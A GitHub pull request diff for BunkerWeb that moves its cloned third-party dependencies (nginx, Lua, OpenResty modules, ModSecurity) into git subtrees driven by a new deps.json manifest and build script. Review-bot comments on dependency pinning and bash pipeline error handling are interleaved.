Merge pull request #547 from bunkerity/subtrees
Migrate regular cloned deps into subtrees
commit
5631e27378
|
@ -1,342 +0,0 @@
|
|||
#!/bin/bash
|
||||
|
||||
function git_update_checker() {
|
||||
repo="$1"
|
||||
commit="$2"
|
||||
main_tmp_folder="/tmp/bunkerweb"
|
||||
mkdir -p "${main_tmp_folder}"
|
||||
echo "ℹ️ Check updates for ${repo}"
|
||||
folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")"
|
||||
output="$(git clone --recursive "$repo" "${main_tmp_folder}/${folder}")"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Error cloning $1"
|
||||
echo "$output"
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
return
|
||||
fi
|
||||
old_dir="$(pwd)"
|
||||
cd "${main_tmp_folder}/${folder}"
|
||||
output="$(git checkout "${commit}^{commit}" 2>&1)"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Commit hash $commit is absent from repository $repo"
|
||||
echo "$output"
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
return
|
||||
fi
|
||||
output="$(git fetch 2>&1)"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "⚠️ Upgrade version checker error on $repo"
|
||||
echo "$output"
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
return
|
||||
fi
|
||||
latest_tag=$(git describe --tags `git rev-list --tags --max-count=1`)
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "⚠️ Upgrade version checker error on getting latest tag $repo"
|
||||
echo "$latest_tag"
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
return
|
||||
fi
|
||||
latest_release=$(curl --silent "https://api.github.com/repos/$full_name_repo/releases/latest" | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "⚠️ Upgrade version checker error on getting latest release $repo"
|
||||
echo "$latest_release"
|
||||
rm -fr "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
return
|
||||
fi
|
||||
current_tag=$(git describe --tags)
|
||||
if [[ ! -z "$latest_tag" ]] && [[ "$current_tag" != *"$latest_tag"* ]]; then
|
||||
echo "⚠️ ️Update checker: new tag found: $latest_tag, current tag/release: $current_tag, please update"
|
||||
fi
|
||||
if [[ ! -z "$latest_release" ]] && [[ "$current_tag" != *"$latest_release"* ]]; then
|
||||
echo "⚠️ ️Update checker: new tag found: $latest_release, current tag/release: $current_tag, please update"
|
||||
fi
|
||||
rm -rf "${main_tmp_folder}/${folder}" || true
|
||||
cd "$old_dir"
|
||||
}
|
||||
|
||||
function git_secure_clone() {
|
||||
repo="$1"
|
||||
commit="$2"
|
||||
folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")"
|
||||
if [ ! -d "deps/src/${folder}" ] ; then
|
||||
output="$(git clone --recursive "$repo" "deps/src/${folder}")"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Error cloning $1"
|
||||
echo "$output"
|
||||
exit 1
|
||||
fi
|
||||
old_dir="$(pwd)"
|
||||
cd "deps/src/${folder}"
|
||||
output="$(git checkout "${commit}^{commit}" 2>&1)"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Commit hash $commit is absent from repository $repo"
|
||||
echo "$output"
|
||||
exit 1
|
||||
fi
|
||||
cd "$old_dir"
|
||||
output="$(rm -rf "deps/src/${folder}/.git")"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Can't delete .git from repository $repo"
|
||||
echo "$output"
|
||||
exit 1
|
||||
fi
|
||||
else
|
||||
echo "⚠️ Skipping clone of $repo because target directory is already present"
|
||||
git_update_checker $repo $commit
|
||||
fi
|
||||
}
|
||||
|
||||
function secure_download() {
|
||||
link="$1"
|
||||
file="$2"
|
||||
hash="$3"
|
||||
dir="$(echo $file | sed 's/.tar.gz//g')"
|
||||
if [ ! -d "deps/src/${dir}" ] ; then
|
||||
output="$(wget -q -O "deps/src/${file}" "$link" 2>&1)"
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "❌ Error downloading $link"
|
||||
echo "$output"
|
||||
exit 1
|
||||
fi
|
||||
check="$(sha512sum "deps/src/${file}" | cut -d ' ' -f 1)"
|
||||
if [ "$check" != "$hash" ] ; then
|
||||
echo "❌️ Wrong hash from file $link (expected $hash got $check)"
|
||||
exit 1
|
||||
fi
|
||||
else
|
||||
echo "⚠️ Skipping download of $link because target directory is already present"
|
||||
fi
|
||||
}
|
||||
|
||||
function do_and_check_cmd() {
|
||||
if [ "$CHANGE_DIR" != "" ] ; then
|
||||
cd "$CHANGE_DIR"
|
||||
fi
|
||||
output=$("$@" 2>&1)
|
||||
ret="$?"
|
||||
if [ $ret -ne 0 ] ; then
|
||||
echo "❌ Error from command : $*"
|
||||
echo "$output"
|
||||
exit $ret
|
||||
fi
|
||||
#echo $output
|
||||
return 0
|
||||
}
|
||||
|
||||
# nginx 1.24.0
|
||||
echo "ℹ️ Downloading nginx"
|
||||
NGINX_VERSION="1.24.0"
|
||||
secure_download "https://nginx.org/download/nginx-${NGINX_VERSION}.tar.gz" "nginx-${NGINX_VERSION}.tar.gz" "1114e37de5664a8109c99cfb2faa1f42ff8ac63c932bcf3780d645e5ed32c0b2ac446f80305b4465994c8f9430604968e176ae464fd80f632d1cb2c8f6007ff3"
|
||||
if [ -f "deps/src/nginx-${NGINX_VERSION}.tar.gz" ] ; then
|
||||
do_and_check_cmd tar -xvzf deps/src/nginx-${NGINX_VERSION}.tar.gz -C deps/src
|
||||
do_and_check_cmd rm -f deps/src/nginx-${NGINX_VERSION}.tar.gz
|
||||
fi
|
||||
|
||||
# Lua 5.1.5
|
||||
echo "ℹ️ Downloading Lua"
|
||||
LUA_VERSION="5.1.5"
|
||||
secure_download "https://www.lua.org/ftp/lua-${LUA_VERSION}.tar.gz" "lua-${LUA_VERSION}.tar.gz" "0142fefcbd13afcd9b201403592aa60620011cc8e8559d4d2db2f92739d18186860989f48caa45830ff4f99bfc7483287fd3ff3a16d4dec928e2767ce4d542a9"
|
||||
if [ -f "deps/src/lua-${LUA_VERSION}.tar.gz" ] ; then
|
||||
do_and_check_cmd tar -xvzf deps/src/lua-${LUA_VERSION}.tar.gz -C deps/src
|
||||
do_and_check_cmd rm -f deps/src/lua-${LUA_VERSION}.tar.gz
|
||||
do_and_check_cmd patch deps/src/lua-${LUA_VERSION}/Makefile deps/misc/lua.patch1
|
||||
do_and_check_cmd patch deps/src/lua-${LUA_VERSION}/src/Makefile deps/misc/lua.patch2
|
||||
fi
|
||||
|
||||
# LuaJIT v2.1-20230410
|
||||
echo "ℹ️ Downloading LuaJIT"
|
||||
git_secure_clone "https://github.com/openresty/luajit2.git" "04f33ff01da97905a1641985fb5c840d234f97f1"
|
||||
|
||||
# lua-nginx-module v0.10.25
|
||||
echo "ℹ️ Downloading lua-nginx-module"
|
||||
git_secure_clone "https://github.com/openresty/lua-nginx-module.git" "c47084b5d719ce507d2419d8660f39544a9d1fea"
|
||||
|
||||
# lua-resty-core v0.1.27
|
||||
echo "ℹ️ Downloading lua-resty-core"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-core.git" "31fae862a1ed64033591f991fadb0dd80358ba0b"
|
||||
|
||||
# lua-resty-lrucache v0.13
|
||||
echo "ℹ️ Downloading lua-resty-lrucache"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-lrucache.git" "a79615ec9dc547fdb4aaee59ef8f5a50648ce9fd"
|
||||
|
||||
# lua-resty-dns v0.22
|
||||
echo "ℹ️ Downloading lua-resty-dns"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-dns.git" "869d2fbb009b6ada93a5a10cb93acd1cc12bd53f"
|
||||
|
||||
# lua-resty-session v4.0.4
|
||||
echo "ℹ️ Downloading lua-resty-session"
|
||||
git_secure_clone "https://github.com/bungle/lua-resty-session.git" "8b5f8752f3046396c414c5b97850e784c07e1641"
|
||||
|
||||
# lua-resty-random v?
|
||||
echo "ℹ️ Downloading lua-resty-random"
|
||||
git_secure_clone "https://github.com/bungle/lua-resty-random.git" "17b604f7f7dd217557ca548fc1a9a0d373386480"
|
||||
|
||||
# lua-resty-string v0.15
|
||||
echo "ℹ️ Downloading lua-resty-string"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-string.git" "b192878f6ed31b0af237935bbc5a8110a3c2256c"
|
||||
|
||||
# lua-cjson v2.1.0.12
|
||||
echo "ℹ️ Downloading lua-cjson"
|
||||
git_secure_clone "https://github.com/openresty/lua-cjson.git" "881accc8fadca5ec02aa34d364df2a1aa25cd2f9"
|
||||
|
||||
# lua-gd v2.0.33r3+
|
||||
echo "ℹ️ Downloading lua-gd"
|
||||
git_secure_clone "https://github.com/ittner/lua-gd.git" "2ce8e478a8591afd71e607506bc8c64b161bbd30"
|
||||
|
||||
# lua-resty-http v0.17.1
|
||||
echo "ℹ️ Downloading lua-resty-http"
|
||||
git_secure_clone "https://github.com/ledgetech/lua-resty-http.git" "4ab4269cf442ba52507aa2c718f606054452fcad"
|
||||
|
||||
# lualogging v1.8.2
|
||||
echo "ℹ️ Downloading lualogging"
|
||||
git_secure_clone "https://github.com/lunarmodules/lualogging.git" "465c994788f1bc18fca950934fa5ec9a909f496c"
|
||||
|
||||
# luasocket v3.1.0
|
||||
echo "ℹ️ Downloading luasocket"
|
||||
git_secure_clone "https://github.com/diegonehab/luasocket.git" "95b7efa9da506ef968c1347edf3fc56370f0deed"
|
||||
|
||||
# luasec v1.3.1
|
||||
echo "ℹ️ Downloading luasec"
|
||||
git_secure_clone "https://github.com/brunoos/luasec.git" "fddde111f7fe9ad5417d75ebbd70429d13eaad97"
|
||||
|
||||
# lua-resty-ipmatcher v0.6.1 (3 commits after just in case)
|
||||
echo "ℹ️ Downloading lua-resty-ipmatcher"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/lua-resty-ipmatcher" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/api7/lua-resty-ipmatcher.git" "7fbb618f7221b1af1451027d3c64e51f3182761c"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/lua-resty-ipmatcher/resty/ipmatcher.lua deps/misc/ipmatcher.patch
|
||||
fi
|
||||
|
||||
# lua-resty-redis v0.30
|
||||
echo "ℹ️ Downloading lua-resty-redis"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-redis.git" "d7c25f1b339d79196ff67f061c547a73a920b580"
|
||||
|
||||
# lua-resty-upload v0.11
|
||||
echo "ℹ️ Downloading lua-resty-upload"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-upload.git" "03704aee42f7135e7782688d8a9af63a16015edc"
|
||||
|
||||
# luajit-geoip v2.1.0
|
||||
echo "ℹ️ Downloading luajit-geoip"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/luajit-geoip" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/leafo/luajit-geoip.git" "12a9388207f40c37ad5cf6de2f8e0cc72bf13477"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/luajit-geoip/geoip/mmdb.lua deps/misc/mmdb.patch
|
||||
fi
|
||||
|
||||
# lbase64 v1.5.3
|
||||
echo "ℹ️ Downloading lbase64"
|
||||
git_secure_clone "https://github.com/iskolbin/lbase64.git" "c261320edbdf82c16409d893a96c28c704aa0ab8"
|
||||
|
||||
# lua-resty-env v0.4.0
|
||||
echo "ℹ️ Downloading lua-resty-env"
|
||||
git_secure_clone "https://github.com/3scale/lua-resty-env.git" "adb294def823dd910ffa11972d2c61eab7cfce3e"
|
||||
|
||||
# lua-resty-mlcache v2.6.0
|
||||
echo "ℹ️ Downloading lua-resty-mlcache"
|
||||
git_secure_clone "https://github.com/thibaultcha/lua-resty-mlcache.git" "f140f56663cbdb9cdd247d29f75c299c702ff6b4"
|
||||
|
||||
# lua-resty-template v2.0
|
||||
echo "ℹ️ Downloading lua-resty-template"
|
||||
git_secure_clone "https://github.com/bungle/lua-resty-template.git" "c08c6bc9e27710806990f2dec0f03b19406976ac"
|
||||
|
||||
# lua-resty-lock v0.09
|
||||
echo "ℹ️ Downloading lua-resty-lock"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-lock.git" "9dc550e56b6f3b1a2f1a31bb270a91813b5b6861"
|
||||
|
||||
# lua-resty-openssl v0.8.23
|
||||
echo "ℹ️ Downloading lua-resty-openssl"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/lua-resty-openssl" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/fffonion/lua-resty-openssl.git" "b23c072a405b749ac60d21e3946cbf57a959b780"
|
||||
if [ "$dopatch" == "yes" ] ; then
|
||||
do_and_check_cmd rm -r deps/src/lua-resty-openssl/t
|
||||
fi
|
||||
|
||||
# lua-ffi-zlib v0.5.0
|
||||
echo "ℹ️ Downloading lua-ffi-zlib"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/lua-ffi-zlib" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/hamishforbes/lua-ffi-zlib.git" "1fb69ca505444097c82d2b72e87904f3ed923ae9"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/lua-ffi-zlib/lib/ffi-zlib.lua deps/misc/lua-ffi-zlib.patch
|
||||
fi
|
||||
|
||||
# lua-resty-signal v0.03
|
||||
echo "ℹ️ Downloading lua-resty-signal"
|
||||
git_secure_clone "https://github.com/openresty/lua-resty-signal.git" "d07163e8cfa673900e66048cd2a1f18523aecf16"
|
||||
|
||||
# ModSecurity v3.0.9
|
||||
echo "ℹ️ Downloading ModSecurity"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/ModSecurity" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/SpiderLabs/ModSecurity.git" "205dac0e8c675182f96b5c2fb06be7d1cf7af2b2"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/ModSecurity/configure.ac deps/misc/modsecurity.patch
|
||||
do_and_check_cmd rm -rf deps/src/ModSecurity/others/libinjection
|
||||
fi
|
||||
|
||||
# libinjection v3.10.0+
|
||||
# TODO: check if the latest commit is fine
|
||||
echo "ℹ️ Downloading libinjection"
|
||||
git_secure_clone "https://github.com/libinjection/libinjection.git" "49904c42a6e68dc8f16c022c693e897e4010a06c"
|
||||
do_and_check_cmd cp -r deps/src/libinjection deps/src/ModSecurity/others
|
||||
|
||||
# ModSecurity-nginx v1.0.3
|
||||
echo "ℹ️ Downloading ModSecurity-nginx"
|
||||
dopatch="no"
|
||||
if [ ! -d "deps/src/ModSecurity-nginx" ] ; then
|
||||
dopatch="yes"
|
||||
fi
|
||||
git_secure_clone "https://github.com/SpiderLabs/ModSecurity-nginx.git" "d59e4ad121df702751940fd66bcc0b3ecb51a079"
|
||||
if [ "$dopatch" = "yes" ] ; then
|
||||
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_log.c deps/misc/modsecurity-nginx.patch
|
||||
do_and_check_cmd patch deps/src/ModSecurity-nginx/config deps/misc/config.patch
|
||||
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_common.h deps/misc/ngx_http_modsecurity_common.h.patch
|
||||
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_module.c deps/misc/ngx_http_modsecurity_module.c.patch
|
||||
do_and_check_cmd cp deps/misc/ngx_http_modsecurity_access.c deps/src/ModSecurity-nginx/src
|
||||
fi
|
||||
|
||||
# libmaxminddb v1.7.1
|
||||
echo "ℹ️ Downloading libmaxminddb"
|
||||
git_secure_clone "https://github.com/maxmind/libmaxminddb.git" "ac4d0d2480032a8664e251588e57d7b306ca630c"
|
||||
|
||||
# zlib v1.2.13
|
||||
echo "ℹ️ Downloading zlib"
|
||||
git_secure_clone "https://github.com/madler/zlib.git" "04f42ceca40f73e2978b50e93806c2a18c1281fc"
|
||||
|
||||
# headers-more-nginx-module v0.34
|
||||
echo "ℹ️ Downloading headers-more-nginx-module"
|
||||
git_secure_clone "https://github.com/openresty/headers-more-nginx-module.git" "bea1be3bbf6af28f6aa8cf0c01c07ee1637e2bd0"
|
||||
|
||||
# nginx_cookie_flag_module v1.1.0
|
||||
echo "ℹ️ Downloading nginx_cookie_flag_module"
|
||||
git_secure_clone "https://github.com/AirisX/nginx_cookie_flag_module.git" "4e48acf132952bbed43b28a8e6af0584dacb7b4c"
|
||||
|
||||
# ngx_brotli v1.0.0
|
||||
echo "ℹ️ Downloading ngx_brotli"
|
||||
git_secure_clone "https://github.com/google/ngx_brotli.git" "6e975bcb015f62e1f303054897783355e2a877dc"
|
||||
|
||||
# ngx_devel_kit v0.3.2
|
||||
echo "ℹ️ Downloading ngx_devel_kit"
|
||||
git_secure_clone "https://github.com/vision5/ngx_devel_kit.git" "b4642d6ca01011bd8cd30b253f5c3872b384fd21"
|
||||
|
||||
# stream-lua-nginx-module v0.0.13
|
||||
echo "ℹ️ Downloading stream-lua-nginx-module"
|
||||
git_secure_clone "https://github.com/openresty/stream-lua-nginx-module.git" "309198abf26266f1a3e53c71388ed7bb9d1e5ea2"
|
|
@ -0,0 +1,233 @@
|
|||
{
|
||||
"download": [
|
||||
{
|
||||
"name": "Lua",
|
||||
"url": "https://www.lua.org/ftp/lua-5.1.5.tar.gz",
|
||||
"sha512": "0142fefcbd13afcd9b201403592aa60620011cc8e8559d4d2db2f92739d18186860989f48caa45830ff4f99bfc7483287fd3ff3a16d4dec928e2767ce4d542a9"
|
||||
}
|
||||
],
|
||||
"git_repository": [
|
||||
{
|
||||
"id": "luajit",
|
||||
"name": "LuaJIT",
|
||||
"url": "https://github.com/openresty/luajit2.git",
|
||||
"commit": "v2.1-20230410"
|
||||
},
|
||||
{
|
||||
"id": "modsecurity",
|
||||
"name": "ModSecurity",
|
||||
"url": "https://github.com/SpiderLabs/ModSecurity.git",
|
||||
"commit": "v3.0.9"
|
||||
},
|
||||
{
|
||||
"id": "modsecurity-nginx",
|
||||
"name": "ModSecurity-nginx",
|
||||
"url": "https://github.com/SpiderLabs/ModSecurity-nginx.git",
|
||||
"commit": "v1.0.3"
|
||||
},
|
||||
{
|
||||
"id": "nginx",
|
||||
"name": "Nginx",
|
||||
"url": "https://github.com/nginx/nginx.git",
|
||||
"commit": "release-1.24.0"
|
||||
},
|
||||
{
|
||||
"id": "ngx_brotli",
|
||||
"name": "Nginx Brotli v1.0.9",
|
||||
"url": "https://github.com/google/ngx_brotli.git",
|
||||
"commit": "6e975bcb015f62e1f303054897783355e2a877dc"
|
||||
},
|
||||
{
|
||||
"id": "nginx_cookie_flag_module",
|
||||
"name": "Nginx cookie flag module",
|
||||
"url": "https://github.com/AirisX/nginx_cookie_flag_module.git",
|
||||
"commit": "v1.1.0"
|
||||
},
|
||||
{
|
||||
"id": "ngx_devel_kit",
|
||||
"name": "Nginx devel kit",
|
||||
"url": "https://github.com/vision5/ngx_devel_kit.git",
|
||||
"commit": "v0.3.2"
|
||||
},
|
||||
{
|
||||
"id": "headers-more-nginx-module",
|
||||
"name": "headers-more-nginx-module",
|
||||
"url": "https://github.com/openresty/headers-more-nginx-module.git",
|
||||
"commit": "v0.34"
|
||||
},
|
||||
{
|
||||
"id": "lbase64",
|
||||
"name": "lbase64",
|
||||
"url": "https://github.com/iskolbin/lbase64.git",
|
||||
"commit": "v1.5.3"
|
||||
},
|
||||
{
|
||||
"id": "libinjection",
|
||||
"name": "libinjection v3.10.0+",
|
||||
"url": "https://github.com/libinjection/libinjection.git",
|
||||
"commit": "49904c42a6e68dc8f16c022c693e897e4010a06c"
|
||||
},
|
||||
{
|
||||
"id": "libmaxminddb",
|
||||
"name": "libmaxminddb",
|
||||
"url": "https://github.com/maxmind/libmaxminddb.git",
|
||||
"commit": "1.7.1"
|
||||
},
|
||||
{
|
||||
"id": "lua-cjson",
|
||||
"name": "lua-cjson",
|
||||
"url": "https://github.com/openresty/lua-cjson.git",
|
||||
"commit": "2.1.0.12"
|
||||
},
|
||||
{
|
||||
"id": "lua-ffi-zlib",
|
||||
"name": "lua-ffi-zlib",
|
||||
"url": "https://github.com/hamishforbes/lua-ffi-zlib.git",
|
||||
"commit": "v0.5"
|
||||
},
|
||||
{
|
||||
"id": "lua-gd",
|
||||
"name": "lua-gd v2.0.33r3+",
|
||||
"url": "https://github.com/ittner/lua-gd.git",
|
||||
"commit": "2ce8e478a8591afd71e607506bc8c64b161bbd30"
|
||||
},
|
||||
{
|
||||
"id": "lua-nginx-module",
|
||||
"name": "lua-nginx-module",
|
||||
"url": "https://github.com/openresty/lua-nginx-module.git",
|
||||
"commit": "v0.10.25"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-core",
|
||||
"name": "lua-resty-core",
|
||||
"url": "https://github.com/openresty/lua-resty-core.git",
|
||||
"commit": "v0.1.27"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-dns",
|
||||
"name": "lua-resty-dns",
|
||||
"url": "https://github.com/openresty/lua-resty-dns.git",
|
||||
"commit": "v0.22"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-env",
|
||||
"name": "lua-resty-env",
|
||||
"url": "https://github.com/3scale/lua-resty-env.git",
|
||||
"commit": "v0.4.0"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-http",
|
||||
"name": "lua-resty-http",
|
||||
"url": "https://github.com/ledgetech/lua-resty-http.git",
|
||||
"commit": "v0.17.1"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-ipmatcher",
|
||||
"name": "lua-resty-ipmatcher v0.6.1 (3 commits after just in case)",
|
||||
"url": "https://github.com/api7/lua-resty-ipmatcher.git",
|
||||
"commit": "7fbb618f7221b1af1451027d3c64e51f3182761c"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-lock",
|
||||
"name": "lua-resty-lock",
|
||||
"url": "https://github.com/openresty/lua-resty-lock.git",
|
||||
"commit": "v0.09"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-lrucache",
|
||||
"name": "lua-resty-lrucache",
|
||||
"url": "https://github.com/openresty/lua-resty-lrucache.git",
|
||||
"commit": "v0.13"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-mlcache",
|
||||
"name": "lua-resty-mlcache",
|
||||
"url": "https://github.com/thibaultcha/lua-resty-mlcache.git",
|
||||
"commit": "2.6.0"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-openssl",
|
||||
"name": "lua-resty-openssl",
|
||||
"url": "https://github.com/fffonion/lua-resty-openssl.git",
|
||||
"commit": "0.8.23"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-random",
|
||||
"name": "lua-resty-random (latest commit)",
|
||||
"url": "https://github.com/bungle/lua-resty-random.git",
|
||||
"commit": "17b604f7f7dd217557ca548fc1a9a0d373386480"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-redis",
|
||||
"name": "lua-resty-redis",
|
||||
"url": "https://github.com/openresty/lua-resty-redis.git",
|
||||
"commit": "v0.30"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-session",
|
||||
"name": "lua-resty-session",
|
||||
"url": "https://github.com/bungle/lua-resty-session.git",
|
||||
"commit": "v4.0.4"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-signal",
|
||||
"name": "lua-resty-signal",
|
||||
"url": "https://github.com/openresty/lua-resty-signal.git",
|
||||
"commit": "v0.03"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-string",
|
||||
"name": "lua-resty-string",
|
||||
"url": "https://github.com/openresty/lua-resty-string.git",
|
||||
"commit": "v0.15"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-template",
|
||||
"name": "lua-resty-template",
|
||||
"url": "https://github.com/bungle/lua-resty-template.git",
|
||||
"commit": "v2.0"
|
||||
},
|
||||
{
|
||||
"id": "lua-resty-upload",
|
||||
"name": "lua-resty-upload",
|
||||
"url": "https://github.com/openresty/lua-resty-upload.git",
|
||||
"commit": "v0.11"
|
||||
},
|
||||
{
|
||||
"id": "luajit-geoip",
|
||||
"name": "luajit-geoip",
|
||||
"url": "https://github.com/leafo/luajit-geoip.git",
|
||||
"commit": "v2.1.0"
|
||||
},
|
||||
{
|
||||
"id": "lualogging",
|
||||
"name": "lualogging",
|
||||
"url": "https://github.com/lunarmodules/lualogging.git",
|
||||
"commit": "v1.8.2"
|
||||
},
|
||||
{
|
||||
"id": "luasec",
|
||||
"name": "luasec",
|
||||
"url": "https://github.com/brunoos/luasec.git",
|
||||
"commit": "v1.3.1"
|
||||
},
|
||||
{
|
||||
"id": "luasocket",
|
||||
"name": "luasocket",
|
||||
"url": "https://github.com/diegonehab/luasocket.git",
|
||||
"commit": "v3.1.0"
|
||||
},
|
||||
{
|
||||
"id": "stream-lua-nginx-module",
|
||||
"name": "stream-lua-nginx-module",
|
||||
"url": "https://github.com/openresty/stream-lua-nginx-module.git",
|
||||
"commit": "v0.0.13"
|
||||
},
|
||||
{
|
||||
"id": "zlib",
|
||||
"name": "zlib",
|
||||
"url": "https://github.com/madler/zlib.git",
|
||||
"commit": "v1.2.13"
|
||||
}
|
||||
]
|
||||
}
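Review bot: Most `commit` values in `git_repository` are tag names (`v3.0.9`, `release-1.24.0`, `v0.10.25`) rather than the full commit hashes the removed clone script passed to `git_secure_clone`, so what gets vendored depends on where the upstream tag points when the subtree is added or pulled. A tag can be moved or re-created upstream, while a full hash cannot; the `ngx_brotli` and `libinjection` entries already keep a hash, so the format supports it. Keeping the hash in `commit` and the readable version in another field would preserve the pin, e.g. `"commit": "205dac0e8c675182f96b5c2fb06be7d1cf7af2b2", "version": "v3.0.9"` for ModSecurity, using the hash from the removed script. The same applies to nginx, which the removed script fetched as a tarball checked against a SHA-512 and which is now taken by tag with no digest.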
|
|
@ -0,0 +1,59 @@
|
|||
#!/bin/bash
|
||||
|
||||
function do_and_check_cmd() {
|
||||
output=$("$@" 2>&1)
|
||||
ret="$?"
|
||||
if [ $ret -ne 0 ] ; then
|
||||
echo "❌ Error from command : $*"
|
||||
echo "$output"
|
||||
exit $ret
|
||||
fi
|
||||
return 0
|
||||
}
|
||||
|
||||
jq -c .download[] src/deps/deps.json | while read download
|
||||
do
|
||||
url="$(echo $download | jq -r .url)"
|
||||
id="$(echo $url | sed 's/.*\/\([^\/]*\)\.tar\.gz/\1/')"
|
||||
name="$(echo $download | jq -r .name)"
|
||||
sha512="$(echo $download | jq -r .sha512)"
|
||||
|
||||
echo "ℹ️ Downloading ${name} from ${url}"
|
||||
|
||||
if [ ! -d "src/deps/src/${id}" ] ; then
|
||||
do_and_check_cmd wget -q -O "src/deps/src/${id}.tar.gz" "$url"
|
||||
check="$(sha512sum "src/deps/src/${id}.tar.gz" | cut -d ' ' -f 1)"
|
||||
if [ "$check" != "$sha512" ] ; then
|
||||
echo "❌️ Wrong hash from file $url (expected $sha512 got $check)"
|
||||
exit 1
|
||||
fi
|
||||
if [ -f "src/deps/src/${id}.tar.gz" ] ; then
|
||||
do_and_check_cmd tar -xvzf src/deps/src/${id}.tar.gz -C src/deps/src
|
||||
do_and_check_cmd rm -f src/deps/src/${id}.tar.gz
|
||||
fi
|
||||
else
|
||||
echo "⚠️ Skipping download of $url because target directory is already present"
|
||||
fi
|
||||
done
|
||||
|
||||
jq -c .git_repository[] src/deps/deps.json | while read repo
|
||||
do
|
||||
id="$(echo $repo | jq -r .id)"
|
||||
name="$(echo $repo | jq -r .name)"
|
||||
url="$(echo $repo | jq -r .url)"
|
||||
commit="$(echo $repo | jq -r .commit)"
|
||||
|
||||
echo "ℹ️ Clone ${name} from ${url} at commit/version ${commit}"
|
||||
|
||||
if [ ! -d "src/deps/src/${id}" ] ; then
|
||||
do_and_check_cmd git subtree add --prefix src/deps/src/${id} ${url} ${commit} --squash
|
||||
else
|
||||
echo "⚠️ Skipping clone of $url because target directory is already present"
|
||||
echo "ℹ️ Updating ${name} from ${url} at commit/version ${commit}"
|
||||
do_and_check_cmd git subtree pull --prefix src/deps/src/${id} ${url} ${commit} --squash
|
||||
fi
|
||||
|
||||
if [ -d "src/deps/src/${id}/.git" ] ; then
|
||||
do_and_check_cmd rm -rf "src/deps/src/${id}/.git"
|
||||
fi
|
||||
done
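Review bot: The `exit 1` on a SHA-512 mismatch and the `exit $ret` inside `do_and_check_cmd` both run inside `jq … | while read download`, and bash runs each part of a pipeline in a subshell, so they end only the loop, not the script. With no `set -e` or `pipefail` visible, a failed download or a wrong hash leaves the unverified tarball on disk, the script carries on to the `git_repository` loop, and the final exit status is that of the last pipeline. Feeding the loop by process substitution keeps it in the main shell: `while IFS= read -r download; do` … `done < <(jq -c '.download[]' src/deps/deps.json)`, and likewise for the `git_repository` loop. Separately, `${url}` and `${commit}` on the `git subtree add`/`pull` lines and `$download`/`$repo` on the `echo … | jq` lines are unquoted; quoting them avoids word splitting and globbing on values read from the JSON file.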
|
|
@ -41,16 +41,19 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/zlib" do_and_check_cmd make install
|
|||
echo "ℹ️ Compiling and installing ModSecurity"
|
||||
# temp fix : Debian run it twice
|
||||
# TODO : patch it in clone.sh
|
||||
cd /tmp/bunkerweb/deps/src/ModSecurity && ./build.sh > /dev/null 2>&1
|
||||
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd sh build.sh
|
||||
